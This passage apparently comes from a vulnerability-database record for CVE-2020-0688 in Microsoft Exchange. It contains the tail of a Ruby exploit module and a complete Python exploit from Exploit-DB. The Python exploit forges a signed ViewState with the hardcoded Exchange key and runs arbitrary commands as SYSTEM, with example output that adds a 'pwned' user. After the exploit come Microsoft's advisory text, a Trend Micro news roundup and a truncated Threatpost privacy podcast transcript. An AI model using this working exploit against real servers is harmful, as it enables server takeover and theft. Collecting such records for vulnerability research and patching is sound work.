vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\r\n\r\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\r\n end\r\nend", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48168"}, {"lastseen": "2020-03-02T07:43:23", "description": "", "published": "2020-03-02T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "EDB-ID:48153", "href": "https://www.exploit-db.com/exploits/48153", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\r\n# Date: 2020-02-28\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\r\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\r\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\r\n# CVE: CVE-2020-0688\r\n\r\n#! /usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n''' \r\n\r\n \r\n\tCopyright 2020 Photubias(c)\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2020-0688-Photubias.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n This is a native implementation without requirements, written in Python 2.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\r\n\r\n Example Output:\r\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\r\n [+] Login worked\r\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\r\n [+] Detected OWA version number 15.2.221.12\r\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\r\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\r\n [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==\r\n Sending now ...\r\n'''\r\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\r\n\r\n## STATIC STRINGS\r\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\r\nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')\r\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\r\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\r\n\r\ndef convertInt(iInput, length): \r\n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\r\n\r\ndef getYsoserialPayload(sCommand, sSessionId):\r\n ## PART1 of the payload to hash\r\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\r\n ## Fix the length fields\r\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\r\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\r\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\r\n strLength2 = convertInt(0x04da + len(sCommand),4)\r\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\r\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\r\n \r\n ## PART2 of the payload to hash\r\n strPart2 = '274e7bb9'\r\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\r\n strPart2 = binascii.unhexlify(strPart2)\r\n \r\n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\r\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\r\n return strResult\r\n\r\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\r\n if not sTarget[-1:] == '/': sTarget += '/'\r\n ## Verify Login\r\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\r\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\r\n except: print('[!] Error, ' + sTarget + ' not reachable')\r\n bLoggedIn = False\r\n for cookie in oCookjar:\r\n if cookie.name == 'cadata': bLoggedIn = True\r\n if not bLoggedIn:\r\n print('[-] Login Wrong, too bad')\r\n exit(1)\r\n print('[+] Login worked')\r\n\r\n ## Verify Session ID\r\n sSessionId = ''\r\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\r\n for cookie in oCookjar:\r\n if 'SessionId' in cookie.name: sSessionId = cookie.value\r\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\r\n\r\n ## Verify OWA Version\r\n sVersion = ''\r\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\r\n except: sVersion = 'favicon'\r\n if 'favicon' in sVersion:\r\n print('[*] Problem, this user has never logged in before (wizard detected)')\r\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\r\n exit(1)\r\n print('[+] Detected OWA version number '+sVersion)\r\n\r\n ## Verify ViewStateValue\r\n sViewState = ''\r\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\r\n except: pass\r\n if sViewState == 'B97B4E27':\r\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\r\n else:\r\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\r\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\r\n if ans == '' or ans.lower() == 'n': exit(1)\r\n return sSessionId, sTarget, sViewState\r\n \r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\r\n parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')\r\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\r\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\r\n args = parser.parse_args()\r\n if args.target == '' or args.username == '' or args.command == '':\r\n print('[!] Example usage: ')\r\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\r\n else:\r\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\r\n else: sPassword = args.password\r\n ctx = ssl.create_default_context()\r\n ctx.check_hostname = False\r\n ctx.verify_mode = ssl.CERT_NONE\r\n oCookjar = cookielib.CookieJar()\r\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\r\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\r\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\r\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\r\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')\r\n if ans.lower() == 'n': exit(0)\r\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\r\n print('[+] Got Payload: ' + sPayLoad)\r\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\r\n print(' Sending now ...')\r\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\r\n except urllib2.HTTPError, e:\r\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48153"}], "mscve": [{"lastseen": "2020-08-07T11:48:32", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0688"], "description": "A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.\n\nKnowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM.\n\nThe security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install.\n", "edition": 2, "modified": "2020-02-11T08:00:00", "id": "MS:CVE-2020-0688", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688", "published": "2020-02-11T08:00:00", "title": "Microsoft Exchange Validation Key Remote Code Execution Vulnerability", "type": "mscve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2020-04-10T15:48:34", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about why Zoom has released an update for its Linux, Mac, and Windows apps that removes the meeting ID from the app's title bar. Also, read about Trend Micro\u2019s latest research on cloud-specific security, with examples of threats and risks that organizations could face when migrating to the cloud or using cloud services.\n\nRead on:\n\n[**Trend Micro Study Shows Cloud Misconfiguration as Major Threat**](<https://solutionsreview.com/security-information-event-management/trend-micro-study-shows-cloud-misconfiguration-as-major-threat/>)\n\n_This week, Trend Micro _[_released_](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/exploring-common-threats-to-cloud-security>)_ new research findings concerning cloud security, a major area of concern for enterprises of all sizes. The research confirms the role of both human errors and complex deployments in creating cloud-based cyber threats; above all, Trend Micro notes the dangers of cloud misconfiguration to cloud environments. _\n\n[**NCSA Small Business Webinar Series**](<https://blog.trendmicro.com/ncsa-small-business-webinar-series/>)\n\n_The National Cyber Security Alliance is hosting a series of webinars for small business owners, and Trend Micro is proud to support this effort with guest speakers sharing threat intelligence and security expertise. The topics will help small companies deal with the challenges of COVID-19, including sessions on telework, digital spring cleaning, e-commerce security, how to avoid COVID-19 scams and more. _\n\n[**Cisco \u2018Critical Update\u2019 Phishing Attack Steals Webex Credentials**](<https://threatpost.com/cisco-critical-update-phishing-webex/154585/>)\n\n_An ongoing phishing campaign is reeling in victims with a recycled Cisco security advisory that warns of a critical vulnerability. The campaign urges victims to \u201cupdate,\u201d only to steal their credentials for Cisco\u2019s Webex web conferencing platform instead. The campaign is looking to leverage the wave of remote workers who have come to rely on online conferencing tools like Webex and other platforms._\n\n[**Principles of a Cloud Migration \u2013 From Step One to Done**](<https://blog.trendmicro.com/principles-of-a-cloud-migration-from-step-one-to-done/>)\n\n_Cloud migrations are happening every day and analysts predict over 75% of mid-size to large enterprises will migrate a workload to the cloud by 2021 \u2013 but how can you make sure your workload is successful? In this multi-part blog series, Trend Micro explores best practices, forward thinking, and use cases around creating a successful cloud migration from multiple perspectives. _\n\n[**Zoomed In: A Look into a Coinminer Bundled with Zoom Installer**](<https://blog.trendmicro.com/trendlabs-security-intelligence/zoomed-in-a-look-into-a-coinminer-bundled-with-zoom-installer/>)\n\n_Trend Micro recently found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up downloading a malicious file. The compromised files are assumed to come from fraudulent websites. Trend Micro has been working with Zoom to ensure that they are able to communicate this to their users appropriately._\n\n[**Investigation into a Nefilim Attack Shows Signs of Lateral Movement, Possible Data Exfiltration**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/investigation-into-a-nefilim-attack-shows-signs-of-lateral-movement-possible-data-exfiltration>)\n\n_Trend Micro\u2019s Managed XDR (MxDR) and Incident Response (IR) teams recently investigated an incident involving a company that was hit by the Nefilim ransomware, which was initially discovered in March 2020. What makes Nefilim especially devious is that the threat actors behind the attack threaten to release the victim\u2019s stolen data on an online leak site._\n\n[**Zoom Removes Meeting IDs from App Title Bar to Improve Privacy**](<https://www.zdnet.com/article/zoom-removes-meeting-ids-from-app-title-bar-to-improve-privacy/>)\n\n_Video conferencing service Zoom has released an update for its _[_Linux_](<https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux>)_, _[_Mac_](<https://support.zoom.us/hc/en-us/articles/201361963-New-Updates-for-macOS>)_, and _[_Windows_](<https://support.zoom.us/hc/en-us/articles/201361953-New-Updates-for-Windows>)_ apps that removes the meeting ID from the app's title bar.__ The update comes after the company's users have often leaked their meeting IDs, and even meeting passwords, when sharing screenshots of their meetings on social media._\n\n[**Analysis: Suspicious \u201cVery Hidden\u201d Formula on Excel 4.0 Macro Sheet**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/analysis-suspicious-very-hidden-formula-on-excel-4-0-macro-sheet>)\n\n_A malicious Microsoft Excel 4.0 Macro sheet with a suspicious formula that is set as \u201cVery Hidden\u201d was submitted by a customer and further analyzed by Trend Micro researchers. The sheet is not readily accessible via the Microsoft Excel User Interface (UI) due to a feature documented in the Microsoft website that allows users to hide sheets. The compromised files were commonly used as an attachment in spam._\n\n[**Actively Exploited MS Exchange Flaw Present on 80% of Exposed Servers**](<https://www.helpnetsecurity.com/2020/04/08/exploit-cve-2020-0688/>)\n\n_Attackers looking to exploit CVE-2020-0688, a critical Microsoft Exchange flaw patched by Microsoft in February 2020, don\u2019t have to look hard to find a server they can attack: according to an internet-wide scan performed by Rapid7 researchers, there are at least 315,000 and possibly as many as 350,000 vulnerable on-premise Exchange servers (out of 433,464 total) out there._\n\n[**Misconfigured Docker Daemon API Ports Attacked for Kinsing Malware Campaign**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/misconfigured-docker-daemon-api-ports-attacked-for-kinsing-malware-campaign>)\n\n_A campaign that targets misconfigured Docker Daemon API ports through Kinsing malware was reported by security researchers from Aqua Security. The campaign exploited the ports to run an Ubuntu container. According to the researchers, Kinsing malware\u2019s strings revealed that it is a Golang-based Linux agent._\n\n[**Threat Actors Deliver Courier-Themed Spam Campaign with Attached ACE Files**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/threat-actors-deliver-courier-themed-spam-campaign-with-attached-ace-files>)\n\n_Trend Micro researchers detected a new courier service-themed malicious spam campaign that uses ACE files as attachments. The samples were gathered from Trend Micro\u2019s honeypot. The email poses as a shipment arrival notification with a fake receipt attached. It then convinces receivers to download the attachment by asking them to check if the address on the receipt is correct.blo_\n\n[**Exploring Common Threats to Cloud Security**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/exploring-common-threats-to-cloud-security>)\n\n_Trend Micro\u2019s recent cloud research provides examples of threats and risks organizations could face when migrating to the cloud or using cloud services. No matter the cloud service or platform, the common theme is that misconfiguration continues to be one of the major pitfalls of cloud security, affecting both companies who subscribe to cloud services and users of software that are hosted on the cloud._\n\n[**PowerPoint \u2018Weakness\u2019 Opens Door to Malicious Mouse-Over Attack**](<https://threatpost.com/powerpoint-weakness-mouse-over-attack/154589/>)\n\n_A researcher is sounding the alarm over what he believes could be a novel attack vector which allows a hacker to manipulate a PowerPoint file to download and begin the installation of malware, simply by hovering over a hypertext link. The technique does require a victim to accept one pop-up dialogue box to run or install a program. For those reasons, Microsoft does not consider this a vulnerability. _\n\n[**Cloud Transformation Is the Biggest Opportunity to Fix Security**](<https://blog.trendmicro.com/cloud-transformation-is-the-biggest-opportunity-to-fix-security/>)\n\n_Lower costs, improved efficiencies and faster time to market are some of the primary benefits of transitioning to the cloud. However, it\u2019s not done overnight. It can take years to move complete data centers and operational applications to the cloud and the benefits won\u2019t be fully realized until most functional data have been transitioned._\n\n[**Who is World Wired Labs and Why Are They Selling an Android Trojan?**](<https://www.cyberscoop.com/world-wired-labs-winnti-netwire-china-blackberry-cylance/>)\n\n_A company advertising a remote access tool frequently used by criminals and nation-state hackers may be serving as a front for a Chinese hacking group, according to research published by BlackBerry Cylance. In a report on remote access trojans (RAT), researchers detail an Android malware variant, which they call PWNDROID4, that can be used to monitor targets\u2019 phone calls, record audio, send and receive text messages, and track victims\u2019 GPS location._\n\nIs your organization looking to migrate to the cloud? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Exploring Common Threats to Cloud Security and Zoom Removes Meeting IDs from App Title Bar to Improve Privacy](<https://blog.trendmicro.com/this-week-in-security-news-exploring-common-threats-to-cloud-security-and-zoom-removes-meeting-ids-from-app-title-bar-to-improve-privacy/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2020-04-10T12:46:43", "published": "2020-04-10T12:46:43", "id": "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "href": "https://blog.trendmicro.com/this-week-in-security-news-exploring-common-threats-to-cloud-security-and-zoom-removes-meeting-ids-from-app-title-bar-to-improve-privacy/", "type": "trendmicroblog", "title": "This Week in Security News: Exploring Common Threats to Cloud Security and Zoom Removes Meeting IDs from App Title Bar to Improve Privacy", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-08T11:52:11", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Data privacy has been an outstanding theme this past week, and the Threatpost team discussed the biggest privacy related news. In the news wrap podcast for April 26, the team discussed the backstories behind several reports from the week, including:\n\n * Facebook potentially [facing Federal Trade Commission (FTC) fines](<https://threatpost.com/facebook-5-billion-ftc-fine/144104/>) as high as $5 billion for its data-security practices\n * A report that employees at Amazon can [access geolocation information](<https://threatpost.com/amazon-employees-personal-alexa/144119/>) for Alexa users\n * Questions around data security and consent around[ facial recognition](<https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/>) after the EU\u2019s approval of a massive biometrics database\n * The exposure of [2 million passwords](<https://threatpost.com/leaky_app_data/144029/>) for Wi-Fi hotspots online by an insecure database\n\n[\ufeff\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/9544445/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below is a lightly edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell**: Welcome to the Threatpost podcast, and the Threatpost team is all here this Friday morning. You\u2019ve got Lindsey O\u2019Donnell and I\u2019m here with Tara Seals and Tom Spring. Hey, everyone.\n\n**Tara Seals:**Hey, Lindsey.\n\n**Tom Spring: **How\u2019s it going, Lindsey? How\u2019s it going, Tara?\n\n**Lindsey**: Good. So, privacy has really been kind of the name of the game this week, in terms of all the stories that we\u2019ve written. And I know, we had a lot of data privacy type stories, everything from Amazon Echo privacy issues to facial recognition. But if we\u2019re talking about data privacy, I think we should really start by bringing Facebook into the conversation here, as we usually do.\n\n**Tara: **Yeah, that seems to have been a top theme of the week for sure. And you did a ton of reporting on that this week.\n\n**Lindsey: **Yeah, so, the big news this week was that Facebook may be facing fines of between $3 to $5 billion for that FTC fine that was related to the Cambridge Analytica incident last year, and all of their data privacy issues that they\u2019ve had since then. So, Facebook had its earnings and disclosed this amount of money that is set aside as contingency expenses. And I feel like we keep hearing about reports of Facebook, having all these data sharing incidents, or having all these crazy data practices, but now we\u2019re really looking at the consequences. And everyone\u2019s wondering how data collection and sharing will be regulated and what kind of fines we\u2019ll see. So that should be interesting to keep an eye on how this actually plays out in the coming months.\n\n**Tara: **Yeah, and I wonder in terms of all of that, when we talk about the GDPR, over in Europe, and how it has really stringent requirements for explicit consent before somebody harvests your data, which obviously is not something that Facebook adheres to, for U.S. citizens anyway \u2013 have there been any rumblings out there in terms of whether or not Facebook might face future regulation?\n\n**Lindsey: **I think that\u2019s there\u2019s been a lot of discussion about it. I know, obviously, Mark Zuckerberg has appeared in front of Congress. And it\u2019s definitely been at the forefront of discussion. But beyond some state-level data privacy practice regulations, it\u2019s something that people are still trying to figure out. So I think that\u2019s kind of why this FTC fine is at the center of attention. There was news today, actually, that the _New York Times _was talking to sources who said that the FTC is discussing stronger monitoring of Facebook\u2019s privacy policies, as well as direct punishment of Mark Zuckerberg. So that raises questions about how to deal with data sharing, whether it\u2019s kind of hitting at the CEO, or even just imposing bigger fines. But Tara, I know, you listen to the actual earnings call. Were there any special call outs about the fine or data security in general? I\u2019m curious if they talked about it at all.\n\n**Tara:**They studiously avoided talking about the fines specifically, which, it\u2019s a charge off of, they added $3 billion, and they said it could go up to as much as $5 billion, and so that ate into their profit, which is kind of interesting, because they reported, I think it was, I don\u2019t have it in front of me, but I think it was around like $2.3 billion in profit for the quarter.\n\nAnd that that is taking into account that $3 billion contingency fine. And they didn\u2019t really specifically discuss it. But they did say that they expected profits to continue to waver a little bit going forward, due to regulatory headwinds, as well as advertising-related falloff, because they\u2019re not sure that they can make the same amount of revenue off of ad targeting that they have in the past.\n\nSo that sort of in a roundabout way speaks to the fact that they\u2019re looking into making some changes in terms of how they collect and use user data. But that\u2019s sort of reading between the lines, and they certainly didn\u2019t say anything explicit about it, unfortunately.\n\n**Lindsey: **Right. Well, I know one big point of discussion was, is this enough? How does this compare to past fines? Because I know Facebook has faced various fines in the past, which Tara you have actually written about. I think it was in December it was fined like $11 million. And then in October, it was fined $645,000. So obviously, those kind of shy away in comparison to $5 billion, but I think people are still kind of asking, how does this compare? Facebook\u2019s kind of overall \u2013\n\n**Tara: **Yeah, their overall profit, annual, you know, $3 to 5 billion is significant for them, actually.\n\n**Tom:**Well, I just looked it up. Facebook made more than $40 billion in revenue in 2017.\n\n**Tara: **What\u2019s the profit? That\u2019s the real marker right?\n\n**Tom: **Well, it is the real marker.\n\n**Lindsey: ** I\u2019m curious what will come out of it. But I do know that everyone\u2019s really looking at this as some sort of precedent for how Facebook will be regulated in the future, if it continues with the data security issues that have been happening over the past year, since Cambridge Analytica.\n\n**Tara: **One of the things too, Lindsey, that I wanted to ask you about was, you know, [the poll that we did](<https://threatpost.com/three-fourths-of-consumers-dont-trust-facebook-threatpost-poll-finds/143963/>) on attitudes towards Facebook. But, you know, also in the wake of their earnings that showed that they had seen an 8 percent year over year, subscriber jump, so the headlines, even though people are sort of horrified by them, they\u2019re not really dissuading people from actually using the platform, which I think is interesting. And then also their stock price just skyrocketed, after they reported their earnings, even with the charge off for the fine. So I don\u2019t know, I don\u2019t know what\u2019s going to happen in the future and whether any of this is going to make a difference in terms of whether or not it\u2019s successful as a company.\n\n**Tom: **I was just thinking, I think that, it\u2019d be interesting to watch the regulatory space to see what the U.S. does, especially with GDPR, in terms of what\u2019s going on in Europe, and really a constant sort of, you know, march of bad news in terms of privacy, and also with breaches that are taking place, not only with Facebook, but with a ton of other companies \u2013 I think what we\u2019re doing is we\u2019re setting up in 2020, and beyond some new rules around privacy and some new regulations around privacy. Because I mean, as you just pointed out, Tara, fines and threats and punishments are not really are impacting the way Facebook\u2019s doing business or hurting them in terms of their business model.\n\n**Lindsey: **Right. I don\u2019t think at all that people are going to stop using Facebook. And I mean, to be totally honest, even if they do adopt some sort of model where you pay to use the platform without advertising or without your data being collected and shared \u2013 I\u2019m not sure how many people would even opt in for that as well. I mean, I could be completely wrong. But I don\u2019t know if people are going to pay an extra like $5 a month or something to use a social media platform that\u2019s already free.\n\n**Tom: **Yeah, I don\u2019t think anybody\u2019s going to be paying. But I think what you\u2019ll see is probably some government intervention. That\u2019s my prediction. I mean, the things that we regulate here in the U.S. \u2013 these companies, whether it be Amazon, Google, or Facebook, they\u2019ve basically had a clear runway to do whatever they wanted for I don\u2019t know how many years. And, you know, if you think about all the different things that we regulate in this country, privacy really isn\u2019t one of them right now, but certainly isa right target for legislators to focus on.\n\n**Lindsey: **Right. That\u2019s the good point. Speaking of Amazon, I know, Tara, you covered a really interesting story this week too about news of their auditing program for Echo devices, which had already been reported. But now I guess a new report said that they\u2019re also exposing geolocation data, in addition to voice data. Can you add some color there?\n\n**Tara: **Sure. So, this story was really interesting to me. And it\u2019s not just Echo either. It\u2019s also, you know, the other Alexa devices including the Fire TV devices and there are tons of third-party gadgets that have Alexa built in now. So this is kind of a broad reaching story, from an Internet of Things perspective. But yeah, so apparently, and as you pointed out, this is something that _Bloomberg _had broken a story on about three weeks ago, talking about the fact that Amazon has a team of people in place that may manually audit Alexa interactions to make sure that the AI is learning appropriately. And it\u2019s been effective and accurate and returning good results for users, and all that kind of thing. But what\u2019s interesting is in the process of that, this data, which is supposed to be anonymous, right? So it\u2019s just sort of random snippets \u2013 human people will listen to this, and then see what Alexa\u2019s response was matched up, make sure that it\u2019s accurate, do whatever secret sauce they have to do with the algorithm and the AI to fix it, or to make her smarter \u2013 But in the process of this, 